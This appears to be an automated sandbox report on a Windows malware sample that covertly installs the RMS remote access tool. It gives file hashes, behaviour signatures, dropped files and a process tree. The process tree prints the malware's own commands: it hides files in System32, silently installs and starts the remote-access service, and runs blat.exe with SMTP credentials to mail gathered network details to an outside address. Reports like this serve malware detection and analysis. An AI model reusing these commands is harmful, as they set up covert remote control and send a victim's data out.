Analysis

  • max time kernel
    149s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-12-2024 00:18

General

  • Target

    f6665ffcda974dd32f3ee0b6b803fd34_JaffaCakes118.exe

  • Size

    1.7MB

  • MD5

    f6665ffcda974dd32f3ee0b6b803fd34

  • SHA1

    c03501cfe0652b14f0f5d4cea6ba47f00795c6b2

  • SHA256

    7c2bb2e0ba7a643d2c39eea01a117edde0ebc23f42ca538030435305bb40035d

  • SHA512

    d4c9bdb721502bafb4f063a6e6753fb83aee80ec1c2ef21cee503467257699d4dd2893a184204dcf69ca44267b634bee5557f24609f59a776627c6ecb3329489

  • SSDEEP

    49152:QAJYXsQRx/EJUx6orYHmVW3TBtRaFvPpVHBbpQl:7JYXsQRx/Eux6or3ZvxVHBNQl

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Rms family
  • Deletes itself 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 17 IoCs
  • Drops file in System32 directory 22 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6665ffcda974dd32f3ee0b6b803fd34_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\f6665ffcda974dd32f3ee0b6b803fd34_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\stop.js"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Users\Admin\AppData\Local\Temp\foto.exe
        "C:\Users\Admin\AppData\Local\Temp\foto.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\CF02.tmp\foto.bat" "
          4⤵
          • Loads dropped DLL
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s +r "C:\Windows\system32\HookDrv.dll"
            5⤵
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:616
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s +r "C:\Windows\system32\rfusclient.exe"
            5⤵
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:668
          • C:\Windows\SysWOW64\attrib.exe
            attrib +h +s +r "C:\Windows\system32\rutserv.exe"
            5⤵
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Views/modifies file attributes
            PID:2968
          • C:\Windows\SysWOW64\rutserv.exe
            "rutserv.exe" /silentinstall
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2888
          • C:\Windows\SysWOW64\rutserv.exe
            "rutserv.exe" /firewall
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:1988
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s set.reg
            5⤵
            • System Location Discovery: System Language Discovery
            • Runs .reg file with regedit
            PID:748
          • C:\Windows\SysWOW64\rutserv.exe
            "rutserv.exe" /start
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2684
          • C:\Windows\SysWOW64\blat.exe
            "C:\Windows\system32\blat.exe" -install -server smtp.yandex.ru -port 587 -f [email protected] -u zverka2011 -pw 23dfgr5t4
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2964
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /all
            5⤵
            • System Location Discovery: System Language Discovery
            • Gathers network information
            PID:2200
          • C:\Windows\SysWOW64\findstr.exe
            findstr "IP" C:\Windows\system32\ip1.txt
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2104
          • C:\Windows\SysWOW64\blat.exe
            "C:\Windows\system32\blat.exe" "C:\Windows\system32\1.txt" -to [email protected]
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2212
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:2728
  • C:\Windows\SysWOW64\rutserv.exe
    C:\Windows\SysWOW64\rutserv.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Windows\SysWOW64\rfusclient.exe
      C:\Windows\SysWOW64\rfusclient.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:1384
      • C:\Windows\SysWOW64\rfusclient.exe
        C:\Windows\SysWOW64\rfusclient.exe /tray
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1388
    • C:\Windows\SysWOW64\rfusclient.exe
      C:\Windows\SysWOW64\rfusclient.exe /tray
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1848

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

    Filesize

    264B

    MD5

    cd335f13d48e22f5da2f19acebb28832

    SHA1

    333ff54eb67cff56740c37980e80e2815e64cc32

    SHA256

    8c8ca694c2c731d61958e678d5761f74e0791630e42944b702bb21141c6a3442

    SHA512

    a2f0560271405587cc09b5a7ab6e3ef183e8b381f639ba323c9e977ada6d5a5e68525649f5b15ca2ff2a51e9a3264d6adb697733608238020a2d591339503d61

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\HookDrv.dll

    Filesize

    144KB

    MD5

    513066a38057079e232f5f99baef2b94

    SHA1

    a6da9e87415b8918447ec361ba98703d12b4ee76

    SHA256

    02dbea75e8dbcdfc12c6b92a6c08efad83d4ca742ed7aee393ab26cab0c58f9e

    SHA512

    83a074bef57f78ede2488dd586b963b92837e17eea77ebd1464f3da06954ae8ca07f040089af0c257e2836611ae39424574bd365aea4a6318a2707e031cd31a5

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\blat.dll

    Filesize

    120KB

    MD5

    724cae63522f6e5f7565a3bf4b2a719b

    SHA1

    18620dbd4357d85918070f669ff4b61755290757

    SHA256

    b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779

    SHA512

    af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\blat.exe

    Filesize

    112KB

    MD5

    31f84e433e8d1865e322998a41e6d90e

    SHA1

    cbea6cda10db869636f57b1cffad39b22e6f7f17

    SHA256

    aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

    SHA512

    7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\blat.lib

    Filesize

    2KB

    MD5

    3cd3cffda2b5108e2778f94429c624d6

    SHA1

    3e4d218d1b8eb4fa1ab5152b126951892aff3dc9

    SHA256

    b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff

    SHA512

    c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\foto.bat

    Filesize

    1KB

    MD5

    a9ebd254a2bb8318369fa9cd2b51e380

    SHA1

    45cf7b0f6b0b77325257abd184da293116c53eaa

    SHA256

    c83af1f773cd73167b34eaa167cd58f0f2af335dfda6d5f8b6d0c43c1f30b3ea

    SHA512

    a6ecc4a9fc6b5a7880a80fd622a2130ee39c90585af696b9efb6860ae43b48a981202d5ce9c7956f6b0208a9560e90ee1849418673a748e472ae4d78636daddc

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\rfusclient.exe

    Filesize

    2.8MB

    MD5

    f449d06b49e258b04bba5eaeab748aa2

    SHA1

    6de5e6fba23c681c949240f5435fba33e3034d27

    SHA256

    c18c2bbafdab4e5974ede842bd4bd854deff9135356681ff84ba2f1c047e7c7a

    SHA512

    b6441ae86e4f65e9d85a75312cc27e0bcc2992c89691be239e787ca28e69409a074e6ae0d1d45f518743fa60c664b85d120786dd57b6faf25bad6cb0b1a90e48

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\rutserv.exe

    Filesize

    3.2MB

    MD5

    11fe69e28c7fc7e975b6485520174de8

    SHA1

    b2e6f974adcec6b18e54e27f83805d8ce3560dea

    SHA256

    2d3c994449f1b13d55e22bbbae4bf36269f21a726c681271ecffc9fcab8f0425

    SHA512

    25a05981afc787d48bd78a2e6a5df28040bb485fc18cccde68c9337597cabff5c70258bba7cbed802075800c9918664cadae775346887544ca7c9a3829f18aa9

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\rversionlib.dll

    Filesize

    310KB

    MD5

    3f95a06f40eaf51b86cef2bf036ebd7a

    SHA1

    64009c5f79661eb2f82c9a76a843c0d3a856695d

    SHA256

    1eb88258b18b215b44620326e35c90a8589f384710e7b2d61abf4f59203bd82d

    SHA512

    6f28b5de28026319bed198f06b5461f688ca401129f1125e9e9d3b58956cc0d546234c2d202827bd74b99afd2ead958a863a520a1f4b7e599d385a8a67062897

  • C:\Users\Admin\AppData\Local\Temp\CF02.tmp\set.reg

    Filesize

    14KB

    MD5

    b94278594be36c6ae537af5b89efdefd

    SHA1

    72ad6ae1559e4f5c06faf03de3a14821d235a1c1

    SHA256

    6cdfa540814a1e394b4df4af42624998d830e6759f14b853893224ee1881426a

    SHA512

    cbdedcc2345dcf3a72e051c75b1597b9388013dab3a7b7ecdb95d1e52240a6c4f5c2795d254e188714c10680f7b38adff50f2a8f6027f6a0eb882d6cce9bf80b

  • C:\Users\Admin\AppData\Local\Temp\foto.exe

    Filesize

    1.6MB

    MD5

    f24ceee8be72e2b171155e748a3ce8c2

    SHA1

    233c2ed6e0dd3ca65027c0470f40ff7c0e4fc099

    SHA256

    f669c7507500ac0117cfc5e4d8c9f01de7f2e656a0e1a47e790eb5895689b06a

    SHA512

    061630ac6aab577f3eb4783a06694a3c607cefcebebe4f5553ed97da8aa6b945507f6f1600a50f2e98353e267fd35d6fb0e94ddd4d4e23fbb8e07a315ebd935f

  • C:\Users\Admin\AppData\Local\Temp\stop.js

    Filesize

    212B

    MD5

    a3d0a0d32ce3c60f0b205d882435f8ac

    SHA1

    b28bad3ef81216f14fd7a262a3ebc2258fcc7d9d

    SHA256

    e7455abc7bdc2d705b007e9b0332e7c8d3793492f33324c7dd10b0a0513c2e3f

    SHA512

    ea53f374b3291ec6ede586250ba787567c37c5f44014d347ac02612071c69f51e8499f2b26e6a7e957f5ca1749495f5c7398f479dd0dbe9bd29e95fa15843af9

  • C:\Windows\SysWOW64\1.txt

    Filesize

    227B

    MD5

    5f8a01ef16d030900bc4c8b41344c39c

    SHA1

    99dc0d1d177c4a39c88b14a60be7fc5077f3f76e

    SHA256

    557cefcee06fa6f300dbd6d48fa1f350372c38f414acf00adc629ee06b2f182a

    SHA512

    3af1e22dd5289cb5fa27cac00a74abe597929b324e53649ac3dab817c3556645078b77770779eb667bc034319da8f4800827460d8986189dfd22a20dd80e6bfb

  • C:\Windows\SysWOW64\ip1.txt

    Filesize

    1KB

    MD5

    d04dfde3eaf7ccb00688c6bb5ae7ba6a

    SHA1

    7efda384d2286370eca79b5c56fc38df6fbe8c9d

    SHA256

    fb98757a615104df7550fb521ed01c242157e52b0154d7e94eba0f46afb128bc

    SHA512

    8ebf86a6a7e97f539c2a27efabbc9c6b1fb275378442fb00cbd0add06817adbe5030d5b7e8f154b0f905df6ba013b3d1a883e14d1a69937d309e8cc8394b990a

  • memory/1384-142-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/1384-141-0x0000000000400000-0x0000000000757000-memory.dmp

    Filesize

    3.3MB

  • memory/1384-160-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/1388-138-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/1388-137-0x0000000000400000-0x0000000000757000-memory.dmp

    Filesize

    3.3MB

  • memory/1848-144-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/1848-143-0x0000000000400000-0x0000000000757000-memory.dmp

    Filesize

    3.3MB

  • memory/1848-149-0x0000000000400000-0x0000000000757000-memory.dmp

    Filesize

    3.3MB

  • memory/1952-19-0x0000000000400000-0x0000000000ABE000-memory.dmp

    Filesize

    6.7MB

  • memory/1952-133-0x0000000000400000-0x0000000000ABE000-memory.dmp

    Filesize

    6.7MB

  • memory/1988-91-0x00000000002F0000-0x0000000000348000-memory.dmp

    Filesize

    352KB

  • memory/1988-89-0x00000000002F0000-0x0000000000348000-memory.dmp

    Filesize

    352KB

  • memory/1988-90-0x0000000000400000-0x00000000007C2000-memory.dmp

    Filesize

    3.8MB

  • memory/2548-9-0x00000000044F0000-0x0000000004BAE000-memory.dmp

    Filesize

    6.7MB

  • memory/2684-110-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/2684-107-0x0000000000400000-0x00000000007C2000-memory.dmp

    Filesize

    3.8MB

  • memory/2888-83-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/2888-85-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/2888-84-0x0000000000400000-0x00000000007C2000-memory.dmp

    Filesize

    3.8MB

  • memory/2900-145-0x0000000000400000-0x00000000007C2000-memory.dmp

    Filesize

    3.8MB

  • memory/2900-139-0x0000000000400000-0x00000000007C2000-memory.dmp

    Filesize

    3.8MB

  • memory/2900-151-0x0000000000400000-0x00000000007C2000-memory.dmp

    Filesize

    3.8MB

  • memory/2900-140-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/2900-164-0x0000000000230000-0x0000000000288000-memory.dmp

    Filesize

    352KB

  • memory/2900-163-0x0000000000400000-0x00000000007C2000-memory.dmp

    Filesize

    3.8MB